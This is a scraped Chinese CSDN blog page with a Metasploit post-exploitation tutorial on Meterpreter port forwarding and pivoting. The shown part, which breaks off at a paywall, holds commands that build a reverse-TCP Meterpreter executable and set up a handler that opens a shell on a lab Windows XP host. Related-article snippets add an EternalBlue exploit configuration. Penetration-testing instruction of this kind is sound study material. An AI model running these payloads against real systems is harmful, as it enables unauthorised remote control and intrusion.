Metasploit渗透技巧:后渗透Meterpreter代理

最新推荐文章于 2024-07-06 15:45:14 发布
最新推荐文章于 2024-07-06 15:45:14 发布
阅读量2k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h4ck0ne/article/details/50570749
版权
本文介绍了如何使用Metasploit的Meterpreter进行渗透测试中的端口转发和代理设置。首先,通过msfpayload生成可执行文件,然后启动msfconsole监听反连端口,获取Meterpreter会话。接着,讲解了portfwd和pivot两种代理方法,包括端口转发和内网穿透。最后,提到了多级代理(如二级、三级代理)的应用,以应对复杂内网环境。通过这种方式,攻击者可以间接访问受限网络内的资源。
摘要由CSDN通过智能技术生成

本文将科普下metasploit隧道代理的使用技巧。

0×00 获取meterpreter

1.首先生成可执行文件

root@kali:~# msfpayload windows/meterpreter/reverse_tcp  LHOST=192.168.101.105 LPORT=444 X > meter.exe

[!] ************************************************************************

[!] *               The utility msfpayload is deprecated!                  *

[!] *              It will be removed on or about 2015-06-08               *

[!] *                   Please use msfvenom instead                        *

[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *

[!] ************************************************************************

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

 Length: 281

Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"}

2.启动msfconsole,监听反连端口

root@kali:~# msfconsole

[*] Starting the Metasploit Framework console.../ 

Taking notes in notepad? Have Metasploit Pro track & report

your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]

+ -- --=[ 1386 exploits - 863 auxiliary - 236 post        ]

+ -- --=[ 342 payloads - 37 encoders - 8 nops             ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler 

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 0.0.0.0

LHOST => 0.0.0.0

msf exploit(handler) > set LPORT 444

LPORT => 444

msf exploit(handler) > show options 

Module options (exploit/multi/handler):

Name  Current Setting  Required  Description

 ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)

   LHOST     0.0.0.0          yes       The listen address

   LPORT     444              yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf exploit(handler) > run 

[*] Started reverse handler on 0.0.0.0:444 

[*] Starting the payload handler...

3.在xp-test1执行meter.exe,attacker获得 meterperter

msf exploit(handler) > run 

[*] Started reverse handler on 0.0.0.0:444 

[*] Starting the payload handler...

[*] Sending stage (770048 bytes) to 192.168.101.107

[*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800

meterpreter > ipconfig

Interface  1

============

Name         : MS TCP Loopback interface

最低0.47元/天 解锁文章
「已注销」
关注
Metasploit 操作及内网 Pivot图文教程
xiongIT的博客
12-04 456
Metasploit 是一款开源的安全漏洞检测工具,集成了丰富的渗透测试工具,深受安全工作者喜爱。
Metasploit***技巧:后***Meterpreter代理
weixin_34413103的博客
01-22 683
前言Metasploit是一个免费的、可下载的***测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施***测试。它本身附带数百个已知软件漏洞的专业级漏洞***测试工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为***,每个人都可以使用***工具来测试那些未打过补丁或者刚刚打过补丁的...
msf挂socks代理
最新发布
weixin_74171325的博客
07-06 128
内网渗透——Metasploit代理转发
m0_65544268的博客
07-10 757
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
Meterpreter代理详解
渗透测试研究中心
08-16 672
0x01 meterpreter多级内网代理穿透 1.Pivoting 基本上可以概括为,在正常情况下仅仅只是通过利用被控制的计算机我们可能依旧无法进行网络访问。假设一台被控制的计算机连接有多个网络,将其作为我们的跳板,那么网络隔离的手段对我们来说就形同虚设。跟着这个思路,攻击者在被控制的跳板主机上执行路由操作,进而访问隐藏的网络。对新发现网络发起的每个请求都会通过中间的双网卡跳板传输,形象化一...
《Vulnhub通关手册》——01 DC-1
weixin_53801131的博客
12-10 4626
​背景概述: 下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/ 本次靶机IP为192.168.2.11 1. 信息收集 1.1 扫描目标主机IP 使用arp-scan进行局域网扫描,使用命令arp-scan -l,扫描结果如下: └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 192.168.2.253 Starting arp-
Metasploit渗透测试:后门通信加密与伪装技巧
Metasploit渗透测试简介 ## 1.1 Metasploit概述 Metasploit是一款用于开发、测试和执行漏洞的框架,成为渗透测试领域中使用最广泛的工具之一。它包含一系列漏洞利用、有效载荷生成、扫描和辅助模块,帮助安全专家...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit的使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
Metasploit渗透测试:隐藏后门制作详解
Metasploit渗透测试简介 ## 1.1 Metasploit概述 Metasploit是一款开源的渗透测试工具,它提供了广泛的渗透测试工具集合和漏洞利用数据库,旨在帮助安全专家识别和测试各种安全漏洞。 ## 1.2 渗透测试概念 渗透...
Metasploit 魔鬼训练营》05 网络服务渗透攻击
kevinhanser
11-07 4412
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. 内存攻防技术 2. MS08-067 攻击案例 3. Oricle 数据库 4. KingView 6.53 HistorySrv 渗透攻击 5. Samba 安全漏洞
OpenAI开发AI版《文明》,一块CPU就能重现AI生存战争史
Dream Fly Together
03-19 580
原文链接:https://mp.weixin.qq.com/s?__biz=MzIzNjc1NzUzMw==&mid=2247515805&idx=2&sn=3a3952337ca44448ffc1df0d6e14fa90&chksm=e8d009efdfa780f994f4addec8fdcd882620e4b78b3d6ee59935c8c8d25c839032...
Vulnhub靶机渗透:Raven1(超级详细)
Mysmycbx的博客
05-19 7814
发现有个contact.zip,下载下来解压,解压出contact.php,阅读源码。进入vendor文件夹,发现上面找到的phpmailer服务就存在这个文件夹里,翻找一下。在上面的内容中,我们获取到www-data权限,但通过扫描wordpress扫描到存在michael和steven两个用户,那能不能从这两个用户中,得到什么呢?下载下来一个试一试。找到了steven的用户凭据,但这里需要解密,使用john解密。,这里习惯性的使用ssh登录一下,结果成功了。扫描到后台,尝试弱密码登录,发现失败。
metasploit进阶
mingyqf的博客
02-28 878
内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost 10.10.10.136 set lport 4444 exploit
二次采样设置的四种彩色模式RGB565,ARGB8888,ARGB4444,ALPHA_8
MR_Condingson的博客
11-19 4247
在上一篇博客三级缓存和二次采样的使用中我们提到了四张彩色模式,下面我就给大家介绍一下 在介绍之前我们小了解一下Android中图片占用内存的几个主要的因素: 1 图片长度 2 图片宽度,   3 单位像素占用的字节数 所以一张图片的占用的内存可以用计算公式: 一张图片(Bitmap)占用的内存 = 图片长度 * 图片宽度 * 单位像素占用的字节数. 需要注意的是:图片长度和图
Manjaro美化 配置教程
diefei3809的博客
08-18 1924
Manjaro Linux的美化 切换源 sudo vi /etc/pacman.conf 加入arch源 [archlinuxcn] SigLevel = Optional TrustedOnly Server = https://mirrors.ustc.edu.cn/archlinuxcn/$arch blackarch源(可以选择加入) [blackarch] SigLeve...
Metasploit魔鬼训练营笔记
qq_39815966的博客
05-17 1592
文章仅仅是记录自己的学习过程,温故而知心,虽然技术有点落后,但是能为以后的学习打开局面。
浏览器控制台报错Failed to load module script:解决方法
weixin_43996999的博客
11-06 1360
原本nginx直指向了一个前端项目,后来又加了一个,就直接复制的上一次的,导致变量名重复报的错。在vue项目打包上传至服务器出现的报错。
metasploit渗透测试笔记(内网渗透篇)
baidu_22850205的专栏
11-02 980
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload wi
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值